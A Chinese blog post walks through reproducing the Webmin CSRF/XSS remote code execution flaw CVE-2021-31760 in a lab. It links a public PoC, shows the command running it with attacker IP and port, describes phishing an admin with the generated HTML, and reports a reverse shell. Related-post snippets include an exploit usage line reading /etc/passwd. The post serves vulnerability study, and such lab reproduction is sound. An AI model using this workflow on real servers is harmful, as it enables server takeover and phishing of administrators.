webmin 代码执行 (CVE-2021-31760)

最新推荐文章于 2024-04-23 19:19:51 发布
最新推荐文章于 2024-04-23 19:19:51 发布
阅读量1.8k 收藏 5
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121267241
版权

webmin 代码执行 (CVE-2021-31760)


所有文章,仅供安全研究与学习之用,后果自负!

webmin 代码执行 (CVE-2021-31760)

0x01 漏洞描述

描述: Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。

远程攻击者可以通过社工管理员,通过CSRF漏洞以及XSS漏洞,实现对远程服务器的代码执行,进而控制并接管服务器。

poc利用前提
默认账号为ubuntu账号密码。
1.需要root账户登录Webmin
2.需要进入/etc/webmin/confing,将referers_none=1修改为

0x02 影响范围

Webmin<=1.9734

0x03 漏洞复现

搭建靶场

环境搭建:
ubuntu 192.168.157.129 存在webmin漏洞的服务器
kali 192.168.157.137 攻击机
win10 192.168.157.1 webmin登录管理员(root登录, 点开恶意xss链接)

1.下载webmin
wget http://prdownloads.sourceforge.net/webadmin/webmin_1.973_all.deb
2.安装依赖
apt-get install perl libnet-ssleay-perl openssl libauthen-pam-perl libpam-runtime libio-pty-perl apt-show-versions python unzip
3.安装Webmin
dpkg -i webmin_1.973_all.deb
安装完成后访问
https://192.168.157.129:10000

(1)win10 管理员 访问靶场
账号密码默认为 ubuntu 登录账号密码

root 123456
在这里插入图片描述
后台界面如下
在这里插入图片描述

(2) kali攻击
poc下载

https://github.com/electronicbots/CVE-2021-31760

执行脚本

python3 RCE_eXploit.py 
https://192.168.157.129:10000 
192.168.157.137
8888 
1
#挨个输入后
#脚本自动启动监听 192.168.157.137:8888端口 
#并且在脚本目录生成一个csrf_poc.html

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
想办法 生成的html 发送给 win10 管理员 让其在登录状态下点开
(3) win10管理员中了钓鱼点开后
自动访问到

https://192.168.157.129:10000/proc/run.cgi

在这里插入图片描述
在kali机上发现 来自 webmin服务器的 shell反弹回来啦

在这里插入图片描述

0x04 漏洞修复

升级至最新版本

参考

https://blog.csdn.net/weixin_45006525/article/details/116259694
https://blog.csdn.net/Cypher_X/article/details/117196940
LuckyCharm~
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Dockerfile 编写之Webmin(CVE-2021-31760)CSRF-RCE
Pio
05-06 374
环境 Dockerfile updatePasswd.sh config webmin_1.973_all.deb 下载地址:http://prdownloads.sourceforge.net/webadmin/webmin_1.973_all.deb readme.txt Dockerfile FROM ubuntu:18.04 ENV LANG=C.UTF-8 ENV DEBIAN_FRONTEND=noninteractive ADD webmin_1.973_all.deb /webmin_
Webmin(CVE-2021-31760)CSRF-RCE环境搭建-漏洞复现
weixin_45006525的博客
04-29 1494
Webmin(CVE-2021-31760) 漏洞简介: Webmin是基于Web的界面的用于类Unix的系统管理工具。该工具基于BS架构,可以让你很轻易的使用任何现代的Web浏览器,很轻易的管理您的服务器。 近日,Webmin官方通告了三个CVE漏洞,包括CVE-2021-31760CVE-2021-31761,CVE-2021-31762。远程攻击者可以通过社工管理员,通过CSRF漏洞以及XSS漏洞,实现对远程服务器的代码执行,进而控制并接管服务器。 以下复现第一个CVE-2021-31760 影响范
Webmin-CSRF(CVE-2021-31760)
m0_65150886的博客
01-26 446
3.如果使用setup.pl脚本进行安装,则可以通过将行referers_none=1添加到/etc/webmin/config中来修复这个此漏洞。2.使用标准的RPM、Deb、TAR和Solaris软件包安装,因为它们不使用setup.pl脚本安装webmin,因此不容易受到攻击。6.在不关闭浏览器并且不退出当前登陆的情况下,点击访问CSRF_POC.html,跳转至登录页面,输入账号密码登录。5.进入CVE-2021-31760-main脚本文件夹,可以看到生成了CSRF_POC.html文件。
【Linux开发实用篇】Webmin和宝塔
最新发布
weixin_62513677的博客
04-23 465
宝塔Linux面板是提升运维效率的服务器管理软件,支持一键LAMP/LNMP/集群/监控/网站/FTP/数据库等多项管理功能。下载地址:http://download.webmin.com/download/yum/这里是将webmin默认密码改为test,通过usr中指定的文件指令。Webmin是功能强大的基于Web的Linux/Unix管理工具。3. 修改webmin服务的端口号(默认为10000)登录:访问 http://ip:6666。当我们忘记了登录信息的时候,可以通过。
webmin中CSRF漏洞(CVE-2021-31760)
FODKING的博客
11-26 1024
该漏洞是CSRF漏洞。webmin是可以管理你的web服务器,攻击者可通过CSRF漏洞,远程执行代码,获取信息及控制服务器。 项目场景: 项目相关背景:该漏洞是CSRF漏洞。webmin是可以管理你的web服务器,攻击者可通过CSRF漏洞,远程执行代码,获取信息及控制服务器。 项目搭建: webmin 1.973> 下载webmin http://prdownloads.sourceforge.net/webadmin 安装: [root@linuxtest ~]# tar -zxvf webmi
CVE-2021-31760漏洞复现 | 初识Webmin & 安装 Ubuntu Desktop
wuuconix's blog
05-23 1385
CVE-2021-31760漏洞复现 | 初识Webmin & 安装 Ubuntu Desktop 该漏洞是Webmin(版本<=1.9734)的CSRF漏洞。Webmin是基于Web的界面的用于类Unix的系统管理工具。远程攻击者可以通过社工管理员,通过CSRF漏洞以及XSS漏洞,实现对远程服务器的代码执行,进而控制并接管服务器。 复现环境 目标机:Ubuntu 20.04 LTS 桌面版 攻击机: Ubuntu Server 20.04 LTS 目标使用Webmin版本: 1.973
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
CVE-2019-15107
05-23
CVE-2019-15107 Webmin(1.890-1.920)后门RCE漏洞的Python实现 基于针对相同漏洞利用的Metasploit模块( ) 漏洞利用大多是自动的。 请参阅./CVE-2019-15107.py --help以了解完整的开关范围 警告:此存储库中的...
wireshark抓包(Webmin 远程命令执行漏洞(CVE-2019-15107))
10-12
wireshark抓包(Webmin 远程命令执行漏洞(CVE-2019-15107))
Webmin with Bacula Integration-开源
05-07
Webmin Plus是Open Country对Webmin的增强。 今天,Webmin的标准版本将接口与流行的开源备份和还原Bacula项目结合在一起。 要获得Webmin的免费副本,请访问Webmin网站www.Webmin.com。
Webmin module for Amanda-开源
05-03
目的是提供一个Webmin模块来配置和管理Amanda Backup System,这是一款出色的备份软件。 通过Webmin界面提供的工具,它将提供一种简单的方法来设置,测试和运行完整的Amanda安装。
Webmin安装及配置
king的专栏
06-01 2947
webmin是一个用浏览器来管理Linux系统的工具。 1、下载:www.webmin.com/download.html webmin-1.340.tar.gz 2、安装: #tar xvfz webmin-1.340.tar.gz #cd webmin-1.340 #./setup.sh
Linux可视化下,webmin的详细安装步骤及使用
a0088169471的博客
03-09 1564
webmin是一款具有相当强大功能的Linux系统管理工具,使得程序员可以得到一个能直接连接到Linux服务器、有图形界面便于快速部署的工具——Web运行环境 (此例中演示的webmin下载至/opt/webmin目录下) 1.webmin 的下载地址为: https://download.webmin.com/download/yum/ 2.在终端输入命令:rpm -ivh webmin-1.700-1.noarch.rpm 3.在终端输入命令进行重置密码:/usr/libexec/w
Webmin(CVE-2021-31761)XSS-RCE
weixin_45006525的博客
04-30 670
Webmin(CVE-2021-3161)漏洞复现 漏洞简介: Webmin是基于Web的界面的用于类Unix的系统管理工具。该工具基于BS架构,可以让你很轻易的使用任何现代的Web浏览器,很轻易的管理您的服务器。 近日,Webmin官方通告了三个CVE漏洞,包括CVE-2021-31760CVE-2021-31761,CVE-2021-31762。远程攻击者可以通过社工管理员,通过CSRF漏洞以及XSS漏洞,实现对远程服务器的代码执行,进而控制并接管服务器。 以下复现CVE-2021-31761,cve
基于Ubuntu22.10系统安装部署webmin软件
q544344318的博客
06-15 1587
Webmin是一个用于Linux系统管理的开源的基于web的系统管理配置工具。有了这个工具的帮助,我们可以管理内部的系统配置,诸如设置用户账户,磁盘配额,像Apache, DNS, PHP, MySQL,文件共享的服务等。本文描述在ubuntu22.10的系统上部署安装最新的webmin软件,本文的webmin软件部署采用源码部署的方式,并通过浏览器进行访问测试。
centos 安装和卸载 webmin
猪脚王的博客
12-03 1078
官方下载路径可以查看下载版本 如果安装提示 则在安装命令后+“–no-check-certificate”,如: 安装依赖 安装 重置密码 webmin的用户名是root,密码为test webmin的配置目录是/etc/webmin进入miniserv.conf 配置文件 修改默认端口号port=10000和listen=10000为如下即可(自己随便设置端口号) webmin服务命令 配置好密码或者端口号后重启下服务 防火墙开放端口号 补充关闭不需要开放的端口号,如: webmin访问登录 访问
webmin改密码
DeepXL
03-22 3174
登陆到终端运行下面的命令:  $sudo locate changepass.pl(如果你不常使用locate的话那,先sudo updatedb)  找到路径,在/home/victor/webmin/下面,转到这个目录下面  $sudo ./changepass.pl /etc/webmin victor 123456  //  /etc/webminwebmin的配置目录,v
Linux 可视化管理(webmin 和 bt(宝塔)运维工具的详细安装教程:webmin 安装配置和使用,bt 宝塔 的安装配置和使用)
weixin_57558097的博客
11-07 4077
webmin 和 bt(宝塔)运维工具的详细安装教程:bt 宝塔 Linux 面板是提升运维效率的服务器管理软件,支持一键 LAMP/LNMP/集群/监控/网站/FTP/数据库/JAVA 等多项服务器管理功能。安装命令。Webmin 是功能强大的基于 Web 的 Unix/linux 系统管理工具。管理员通过浏览器访问 Webmin 的各种管理功能并完成相应的管理操作。除了各版本的 linux 以外还可用于:AIX、HPUX、Solaris、Unixware、Irix 和 FreeBSD 等系统
CVE-2022-36554
08-29
CVE-2022-36554是一个安全漏洞,根据提供的引用内容,我没有找到与该漏洞相关的具体信息。请提供更多关于CVE-2022-36554的细节,以便我能够为您提供更准确的答案。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [CVE-2022-36446 Webmin命令注入漏洞复现](https://blog.csdn.net/qq_44281295/article/details/126345900)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [CVE-2022-34265 &CVE-2019-14234 sql注入](https://blog.csdn.net/weixin_53090346/article/details/125760708)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值